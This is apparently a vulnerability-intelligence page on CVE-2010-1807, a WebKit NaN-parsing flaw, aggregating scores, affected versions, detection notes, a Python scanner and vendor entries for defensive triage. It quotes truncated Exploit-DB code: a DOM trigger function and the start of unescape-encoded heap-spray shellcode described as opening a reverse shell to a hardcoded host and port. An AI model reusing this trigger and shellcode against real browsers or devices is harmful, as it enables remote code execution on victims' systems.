CVE-2010-1807
Published 2010-09-10
Priority P2 · 74 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 61.32% (99.0th percentile)
WebKit in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2; Android before 2.2; and webkitgtk before 1.2.6; does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to non-standard NaN representation.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | 4.x before 4.1.2 | 4.1.2 |
| apple | safari | 5.x before 5.0.2 | 5.0.2 |
| android | android | <= 2.1 | 2.2 |
| webkitgtk | webkitgtk | <= 1.2.5 | 1.2.6 |
Detection & IOCs (extracted from sources)
- bytes: \u33bc\u0057
- bytes: \ua8c0\u0100
- Trigger is a crafted NaN string passed to parseFloat: look for 'NAN(ffffe00572c60)' or similar non-standard NaN representations in HTML/JS content processed by WebKit.
- The exploit uses a heap spray built from large unescape() string buffers, followed by a DOM innerHTML assignment that triggers the use-after-free; monitor for large repeated unicode escape sequences in JavaScript combined with innerHTML writes.
- The vulnerability is triggered via a crafted HTML document containing a non-standard NaN floating-point representation; WebKit's float parser mishandles it, leading to a use-after-free.
- The exploit appends a child span element to a known DOM element and sets its innerHTML to the malicious float string: look for dynamic DOM manipulation patterns that pair appendChild with an innerHTML assignment of float/NaN values.
- The exploit in exploit-db/15548 hardcodes a connect-back IP and port (192.168.0.1 / port 12345) via unescape-encoded shellcode; real-world attacker payloads will substitute their own C2 IP and port in the shellcode bytes.
- The original exploit (exploit-db/15423) is hardcoded to return a shell to 10.0.2.2 port 2222, which is the Android emulator host address; production attacks will use a different IP/port.
- The vulnerability affects Android before 2.2; the exploit author notes 'some said it works on some devices with 2.2', so the patched version alone may not be a reliable exclusion criterion.
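As an added example (not code from any of the sources quoted above), a small Python scanner that applies the patterns listed in these notes to a document body: a non-standard NaN spelling such as NAN(ffffe00572c60), and long \uXXXX escape buffers paired with an innerHTML write. The regexes, the 64-escape run threshold and the two sample documents are constructed assumptions for this example.

```python
import re

# Regexes derived from the detection notes above; they are constructed for this
# example, not taken from any vendor rule, and the run-length threshold is an assumption.
NAN_PAYLOAD_RE = re.compile(r"[+-]?\bnan\([0-9a-f]+\)", re.IGNORECASE)   # e.g. NAN(ffffe00572c60)
UNICODE_RUN_RE = re.compile(r"(?:\\u[0-9a-f]{4}){64,}", re.IGNORECASE)    # long \uXXXX buffers
INNERHTML_RE = re.compile(r"\.innerHTML\s*=")
UNESCAPE_RE = re.compile(r"\bunescape\s*\(")


def scan_content(text: str) -> dict:
    """Score one HTML/JS document for the CVE-2010-1807 trigger pattern."""
    nan_payloads = NAN_PAYLOAD_RE.findall(text)
    unicode_runs = len(UNICODE_RUN_RE.findall(text))
    innerhtml_writes = len(INNERHTML_RE.findall(text))
    unescape_calls = len(UNESCAPE_RE.findall(text))
    # A non-standard NaN spelling alone is enough to flag; a spray-sized escape
    # buffer only counts when it is paired with a DOM write, the shape described above.
    suspicious = bool(nan_payloads) or (unicode_runs > 0 and innerhtml_writes > 0)
    return {
        "nan_payloads": nan_payloads,
        "unicode_runs": unicode_runs,
        "innerhtml_writes": innerhtml_writes,
        "unescape_calls": unescape_calls,
        "suspicious": suspicious,
    }


# Constructed sample documents: an ordinary page, and one carrying the NaN string
# quoted in the notes plus a long, non-functional \u escape buffer.
BENIGN_DOC = (
    '<p>Total: 3.14</p><script>var v = parseFloat("1e3");'
    'document.getElementById("out").innerHTML = "<b>ok</b>";</script>'
)
SUSPICIOUS_DOC = (
    '<script>var buf = unescape("' + "\\u4141" * 80 + '");'
    'el.innerHTML = "NAN(ffffe00572c60)";</script>'
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_DOC), ("suspicious", SUSPICIOUS_DOC)):
        print(name, scan_content(doc))
```

Legitimate pages (minified bundles, CSS with many escapes) can exceed the run threshold, so treat the escape-buffer signal as a triage hint and the NaN spelling as the stronger indicator.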
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.3 | CRITICAL | — |
| vendor_redhat | — | 9.3 | CRITICAL | — |
GHSA
GHSA-qhcv-5g2q-vm4c: WebKit in Apple Safari 4
ghsa_unreviewed · 2022-05-17 · severity HIGH · CWE-20
VulnCheck
Apple safari Improper Input Validation
vulncheck · 2010 · CVSS 9.3 · CRITICAL
Affected: Apple safari
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.talosintelligence.com/content/files/2023/12/2023_Talos_Year_In_Review.pdf
Red Hat
webkit: input validation error when parsing certain NaN values
vendor_redhat · 2010-09-07 · CVSS 9.3 · CRITICAL · CWE-20
No detection rules found.
Exploit-DB
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
exploitdb · 2010-11-15 · CVSS 9.3 · CRITICAL
---
# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807
Better exploit (better rate and more flexible for changes, also shorter shellcode) than what you have, plus, it's also verified. Enjoy!
More details at: http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html
// This code is only for security research/teaching purposes, use at your own risk!
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched= android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
Exploit-DB
Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)
exploitdb · 2010-11-05 · CVSS 9.3 · CRITICAL
// bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// listed as a safari bug but also works on android :)
// tested = moto droid 2.0.1, moto droid 2.1, emulator 2.0 - 2.1
//patched= android 2.2
//author = mj
// hardcoded to return a shell to 10.0.2.2 port 2222
//
function sploit(pop)
{
var span = document.createElement("div");
document.getElementById("pwn").appendChild(span);
span.innerHTML = pop;
}
function heap()
{
var scode = unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c2
Bugzilla
CVE-2010-3113 CVE-2010-1814 CVE-2010-1812 CVE-2010-1815 CVE-2010-3115 CVE-2010-1807 CVE-2010-3114 CVE-2010-3116 CVE-2010-3257 CVE-2010-3259 webkitgtk various flaws [fedora-all]
bugzilla · 2010-10-05 · CVSS 9.3 · CRITICAL
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://adm
Bugzilla
CVE-2010-1807 webkit: input validation error when parsing certain NaN values
bugzilla · 2010-08-26 · CVSS 9.3 · CRITICAL
An input validation issue exists in WebKit's handling of floating point data types. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of floating point values. Credit to Luke Wagner of Mozilla for reporting this issue.
References:
https://bugs.webkit.org/show_bug.cgi?id=43461
http://trac.webkit.org/changeset/64706
Discussion:
This is now public:
http://support.apple.com/kb/HT4333
---
This issue has been corrected in WebKitGTK 1.2.5.
---
Created webkitgtk tracking bugs for this issue
Affects: fedora-all [bug 640382]
---
This issue has been addressed in following products:
Red Hat Ent
References
- http://lists.apple.com/archives/security-announce/2010//Nov/msg00003.html
- http://lists.apple.com/archives/security-announce/2010//Sep/msg00001.html
- http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
- http://secunia.com/advisories/41856
- http://secunia.com/advisories/42314
- http://secunia.com/advisories/43068
- http://secunia.com/advisories/43086
- http://support.apple.com/kb/HT4333
- http://support.apple.com/kb/HT4456
- http://trac.webkit.org/changeset/64706
- http://www.computerworld.com/s/article/9195058/Researcher_to_release_Web_based_Android_attack
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:039
- http://www.redhat.com/support/errata/RHSA-2011-0177.html
- http://www.securityfocus.com/bid/43047
- http://www.ubuntu.com/usn/USN-1006-1
- http://www.vupen.com/english/advisories/2010/2722
- http://www.vupen.com/english/advisories/2010/3046
- http://www.vupen.com/english/advisories/2011/0212
- http://www.vupen.com/english/advisories/2011/0216
- http://www.vupen.com/english/advisories/2011/0552
- https://bugzilla.redhat.com/show_bug.cgi?id=627703
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11964